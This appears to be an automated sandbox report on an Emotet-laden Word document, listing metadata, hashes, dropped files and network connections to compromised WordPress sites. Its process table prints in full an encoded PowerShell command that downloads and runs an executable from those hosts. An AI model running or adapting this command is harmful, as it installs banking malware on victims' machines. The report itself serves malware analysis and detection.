File name: | Documents_10142019HQ-01731.doc |
Full analysis: | https://app.any.run/tasks/f2b2b5b7-0277-46d6-a4b6-3a6a6497b844 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 17:59:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Lake, Subject: payment, Author: Ari Jerde, Keywords: deposit, Comments: Licensed Rubber Tuna, Template: Normal.dotm, Last Saved By: Nels Cartwright, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 15:00:00 2019, Last Saved Time/Date: Mon Oct 14 15:00:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0 |
MD5: | E064623AEA3DD4001CEDE0ED8BCCB05B |
SHA1: | 97CDEC182D207D628FD1D40F818D2E327CBE5AB4 |
SHA256: | FEF332A512D0C08388093254E894647CC0467180CCFED2F62D48935141203FB3 |
SSDEEP: | 3072:3PHuhoQKgdzSrGsKyIwLx38oRaWOcIBOaOhi1o5lE8COrg12bKDmwf9EJZ:3PHuhoQKUzSHnLx38oAWOJQaOhi1wKP |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Lake |
---|---|
Subject: | payment |
Author: | Ari Jerde |
Keywords: | deposit |
Comments: | Licensed Rubber Tuna |
Template: | Normal.dotm |
LastModifiedBy: | Nels Cartwright |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:10:14 14:00:00 |
ModifyDate: | 2019:10:14 14:00:00 |
Pages: | 1 |
Words: | 30 |
Characters: | 172 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Konopelski - Fisher |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 201 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Grady |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2140 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Documents_10142019HQ-01731.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3036 | powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABhAGUAZgA3ADYANQA1ADEAMwAxADAAZQA0ADMAPQAnAGEAMAB4AGMAYQAxAGMAYQBkAGYAOQA2ADgAMAAyADIAJwA7ACQAYQAwAHgAMQBkADMAOABhAGMAMgA4AGQAZgBjAGMANAA2ACAAPQAgACcANAA3ADIAJwA7ACQAYQAwAHgAZABjADQAYwAxADIAYQA3AGUAMwA5ADgAPQAnAGEAMAB4AGUAYQA4ADUAOABhADYAMAA3ADMAZABlADUAMQBkACcAOwAkAGEAMAB4ADEAMQAzADcAYwBlADYAYgBkAGYAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAMQBkADMAOABhAGMAMgA4AGQAZgBjAGMANAA2ACsAJwAuAGUAeABlACcAOwAkAGEAMAB4AGYAZQA0ADMAMgAwADcANAA5ADIAMwAzADkAMQA9ACcAYQAwAHgAMgA4AGQANwBjADkAYQA2AGQANAAwAGYAJwA7ACQAYQAwAHgAMAAyAGMAYgA1AGQAMgBiADEAOABjADYAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAEIAQwBsAGkAZQBuAHQAOwAkAGEAMAB4ADEANQA4ADcAOQAzADQAMAAxAGIAZAAyADQAOAA9ACcAaAB0AHQAcAA6AC8ALwBhAG4AZAByAGUAdwBzAGkAYwBlAGwAbwBmAGYALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGMAagAyAGQAMAAwADAAOQAvACoAaAB0AHQAcAA6AC8ALwBiAGUAYQBuAHMAbQBlAGQAaQBhAC4AYwBvAG0ALwB6AGUAdQBzADEANgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHQAdQBiAGEAdwA1AHkAMwA1AC8AKgBoAHQAdABwADoALwAvAGEAYgBoAGkAZABoAGEAbQBtAGEAcwBvAGMAaQBlAHQAeQAuAGMAbwBtAC8AdwBwAC0AcwBuAGEAcABzAGgAbwB0AHMALwBpAGgAMwB2AHoAZABjADkALwAqAGgAdAB0AHAAOgAvAC8AcABjAGYAMAA4AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAAyADQANAA3AC8AKgBoAHQAdABwADoALwAvAGEAYwBxAHUAaQByAGkAbgBnAC0AdABhAGwAZQBuAHQALgBjAG8AbQAvAGQAcABhAGoALwAwADUAZwBkADUANwA1AC8AJwAuACIAcwBwAGAATABpAFQAIgAoACcAKgAnACkAOwAkAGEAMAB4ADgAOQA5ADAAYQA5AGQANABiAGEAMQAwAGUANwA9ACcAYQAwAHgAZQAxADgAMAAzADgAZgBjADYANQAzAGQANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAYQAwAHgAMABmADcAYgA2AGQAZQA3ADUANQAgAGkAbgAgACQAYQAwAHgAMQA1ADgANwA5ADMANAAwADEAYgBkADIANAA4ACkAewB0AHIAeQB7ACQAYQAwAHgAMAAyAGMAYgA1AGQAMgBiADEAOABjADYALgAiAGQATwB3AE4AbABgAG8AQQBgAGQAYABGAGkAbABlACIAKAAkAGEAMAB4ADAAZgA3AGIANgBkAGUANwA1ADUALAAgACQAYQAwAHgAMQAxADMANwBjAGUANgBiAGQAZgAwACkAOwAkAGEAMAB4ADgAMQBkADkAOQBhADgANwBiADEAZAA9ACcAYQAwAHgANgBiAGIAMwAyADAANQBlADcAMwA4ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAYQAwAHgAMQAxADMANwBjAGUANgBiAGQAZgAwACkALgAiAEwARQBOAGAARwBUAEgAIgAgAC0AZwBlACAAMgAxADMANwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABhAGAAUgBUACIAKAAkAGEAMAB4ADEAMQAzADcAYwBlADYAYgBkAGYAMAApADsAJABhADAAeABjADkANAA1AGYAZQBlAGEAOQBmAD0AJwBhADAAeAA1AGEAYwBmADUAYwBiADYAYQBhACcAOwBiAHIAZQBhAGsAOwAkAGEAMAB4ADAAZQA0ADkAZgBlAGYAMwA1ADIAPQAnAGEAMAB4ADkAZABjAGEANQA5AGUAZgA0AGEANAAzADMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQAwAHgAZgA5ADUANAA5ADYAYQA4ADEAYwA0ADkANAA9ACcAYQAwAHgANgBkADcAZQAyADgAZQAwAGEAMQA2ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA7E3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3036 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4LBT6NS7LGYQ1CQD0GU2.temp | — | |
MD5:— | SHA256:— | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:57C065C449D8BDBE8737E8BAAC4E9580 | SHA256:338318F0365ED3E71A63797DE1E923710D5CA3EA4623141F225DEB0646C962DC | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:4C3134C44E28BF6C6BC5E6F965C0C7FA | SHA256:9C801779D351F4BCE393BD7693536721F69232964EFCFAEE03C56988F569545E | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DAB3F4D.wmf | wmf | |
MD5:7A371A004F39EF9520E0558BEFC2AE2F | SHA256:21987E3154FDA05A9B509A38A3930B42DEF2FDD873A22DC04C1B8F58C152FF90 | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:165AF72BFD1EBC719F89F7255DAA3EBD | SHA256:B4895FD3AE0107CB4DAD788EA31883F6A82DFAAFF40BAC17F5E2165CD5FEFA47 | |||
2140 | WINWORD.EXE | C:\Users\admin\Desktop\~$cuments_10142019HQ-01731.doc | pgc | |
MD5:F7D9BD49019575769DE0A8038C9C2D29 | SHA256:45BB2C86D670E5FE669165379FC90E1DB3D66ADCF34292F169549BC9F75835CA | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74BDDBE3.wmf | wmf | |
MD5:CAB46972BA286DD4183364416F86579C | SHA256:DF78026D382D8648CA4FDD93B5F04FE7F7FEF2878110617D617C87010F9245C0 | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\371B2B82.wmf | wmf | |
MD5:B6DB85839A05A75B7E46D596AC315745 | SHA256:C91348F15A0130FC4ED8489CBE948FF306AB454AD65E097C5F1E35BC43F53954 | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DF69019B.wmf | wmf | |
MD5:16D2B6692B051A88E18B72C4C6396772 | SHA256:0C9C7997B43810A320033116A07DCFD58DE553FFD647DF2BD089C5FAD69FAD2B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3036 | powershell.exe | GET | 404 | 62.210.16.61:80 | http://pcf08.com/wp-content/02447/ | FR | xml | 345 b | malicious |
3036 | powershell.exe | GET | 404 | 149.210.131.83:80 | http://beansmedia.com/zeus16/wp-includes/tubaw5y35/ | NL | xml | 345 b | suspicious |
3036 | powershell.exe | GET | 404 | 173.236.169.124:80 | http://abhidhammasociety.com/wp-snapshots/ih3vzdc9/ | US | xml | 345 b | unknown |
3036 | powershell.exe | GET | 404 | 199.204.248.102:80 | http://andrewsiceloff.com/wp-admin/cj2d0009/ | US | xml | 345 b | suspicious |
3036 | powershell.exe | GET | 404 | 166.62.28.141:80 | http://acquiring-talent.com/dpaj/05gd575/ | US | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3036 | powershell.exe | 173.236.169.124:80 | abhidhammasociety.com | New Dream Network, LLC | US | unknown |
3036 | powershell.exe | 166.62.28.141:80 | acquiring-talent.com | GoDaddy.com, LLC | US | malicious |
3036 | powershell.exe | 149.210.131.83:80 | beansmedia.com | Transip B.V. | NL | suspicious |
3036 | powershell.exe | 199.204.248.102:80 | andrewsiceloff.com | CONTINENTAL BROADBAND PENNSYLVANIA, INC. | US | suspicious |
3036 | powershell.exe | 62.210.16.61:80 | pcf08.com | Online S.a.s. | FR | malicious |
Domain | IP | Reputation |
---|---|---|
andrewsiceloff.com |
| suspicious |
beansmedia.com |
| suspicious |
abhidhammasociety.com |
| unknown |
pcf08.com |
| malicious |
acquiring-talent.com |
| malicious |